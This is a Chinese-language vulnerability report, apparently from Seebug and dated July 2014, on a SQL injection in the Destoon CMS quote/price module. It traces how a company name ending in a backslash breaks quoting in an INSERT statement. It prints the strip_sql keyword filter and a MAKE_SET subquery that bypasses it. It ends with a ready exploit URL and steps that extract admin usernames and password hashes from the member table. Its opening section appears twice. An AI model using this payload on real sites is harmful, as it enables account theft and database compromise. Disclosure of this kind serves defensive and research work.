### 简要描述: 2014-07-22 .应该对关键的地方打补 ### 详细说明: $post = daddslashes(dstripslashes($post)); 打的补丁只是对 修改资料的$post做了daddslashes的措施 但是 注册的时候还是能注册特殊字符的 .找了一处 可以利用的地方 ``` extract($USER, EXTR_PREFIX_ALL, ''); ``` //common.inc.php中的初始化(登录) /module/quote/price.inc.php 24-28 ``` if($_userid) $post['company'] = $_company;//这里使用了 require DT_ROOT.'/module/'.$module.'/price.class.php'; $do = new price; if($do->pass($post)) { $do->add($post); //进入流程 ``` price.class.php中 ``` function add($post) { global $MOD, $L; $post = $this->set($post); $sqlk = $sqlv = ''; foreach($post as $k=>$v) { if(in_array($k, $this->fields)) { $sqlk .= ','.$k; $sqlv .= ",'$v'"; } // 遍历数据 } $sqlk = substr($sqlk, 1); $sqlv = substr($sqlv, 1); $this->db->query("INSERT INTO {$this->table} ($sqlk) VALUES ($sqlv)");//进入查询流程 $this->itemid = $this->db->insert_id(); $this->update($this->itemid, $post); $this->product($this->itemid, $post['pid']); return $this->itemid; } ``` 由于有个转义符破坏了单引号所以可以注入 再看他的 strip_sql这个 更新了下 加了个+号但是还是可以绕过的 ```...
### 简要描述: 2014-07-22 .应该对关键的地方打补 ### 详细说明: $post = daddslashes(dstripslashes($post)); 打的补丁只是对 修改资料的$post做了daddslashes的措施 但是 注册的时候还是能注册特殊字符的 .找了一处 可以利用的地方 ``` extract($USER, EXTR_PREFIX_ALL, ''); ``` //common.inc.php中的初始化(登录) /module/quote/price.inc.php 24-28 ``` if($_userid) $post['company'] = $_company;//这里使用了 require DT_ROOT.'/module/'.$module.'/price.class.php'; $do = new price; if($do->pass($post)) { $do->add($post); //进入流程 ``` price.class.php中 ``` function add($post) { global $MOD, $L; $post = $this->set($post); $sqlk = $sqlv = ''; foreach($post as $k=>$v) { if(in_array($k, $this->fields)) { $sqlk .= ','.$k; $sqlv .= ",'$v'"; } // 遍历数据 } $sqlk = substr($sqlk, 1); $sqlv = substr($sqlv, 1); $this->db->query("INSERT INTO {$this->table} ($sqlk) VALUES ($sqlv)");//进入查询流程 $this->itemid = $this->db->insert_id(); $this->update($this->itemid, $post); $this->product($this->itemid, $post['pid']); return $this->itemid; } ``` 由于有个转义符破坏了单引号所以可以注入 再看他的 strip_sql这个 更新了下 加了个+号但是还是可以绕过的 ``` function strip_sql($string) { $match = array("/union/i","/where/i","/0x([a-z0-9]{2,})/i","/select([\s\*\/\-\(\+])/i","/update([\s\*\/\-\(\+])/i","/replace([\s\*\/\-\(\+])/i","/delete([\s\*\/\-\(\+])/i","/drop([\s\*\/\-\(\+])/i","/outfile([\s\*\/\-\(\+])/i","/dumpfile([\s\*\/\-\(\+])/i","/load_file[\s]*\(/i","/substring[\s]*\(/i","/substr[\s]*\(/i","/left[\s]*\(/i","/concat[\s]*\(/i","/concat_ws[\s]*\(/i","/ascii[\s]*\(/i","/hex[\s]*\(/i","/ord[\s]*\(/i","/char[\s]*\(/i"); $replace = array('union','where','0x\\1','select\\1','update\\1','replace\\1','delete\\1','drop\\1','outfile\\1','dumpfile\\1','load_file(','substring(','substr(','left(','concat(','concat_ws(','ascii(','hex(','ord(','char('); return is_array($string) ? array_map('strip_sql', $string) : preg_replace($match, $replace, $string); } ``` (SELECT@pw:=PW FROM(SELECT@p:=(MAKE_SET(-1,admin,username,PASSWORD)) AS PW FROM destoon_member ORDER BY admin DESC ) C LIMIT 0,1) 这样就绕过了 这个就是 必须有产品报价 才行 itemid = 产品报价id exp: 注册一个账号 然后拦截注册的post数据 把company 改成 xxxx\ 登录状态 http://x.com/quote/price.php itemid=1&post[market]=1&post[price]=50&post[areaid]=1&post[company]=ok&post[note]=,(SELECT@pw:=PW FROM(SELECT@p:=(MAKE_SET(-1,admin,username,PASSWORD)) AS PW FROM destoon_member ORDER BY admin DESC ) C LIMIT 0,1),1,3,1,1,1,1,1)#&captcha=rs8h&submit=ok ### 漏洞证明: [<img src="https://images.seebug.org/upload/201407/232149556ad659e7e919a7ffe36a95c0dc75883f.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/232149556ad659e7e919a7ffe36a95c0dc75883f.jpg) [<img src="https://images.seebug.org/upload/201407/23215016046a302f4688978e30bcd7842e27deb4.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/23215016046a302f4688978e30bcd7842e27deb4.jpg) [<img src="https://images.seebug.org/upload/201407/232150365837506643594082bf0e396217039250.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/232150365837506643594082bf0e396217039250.jpg)
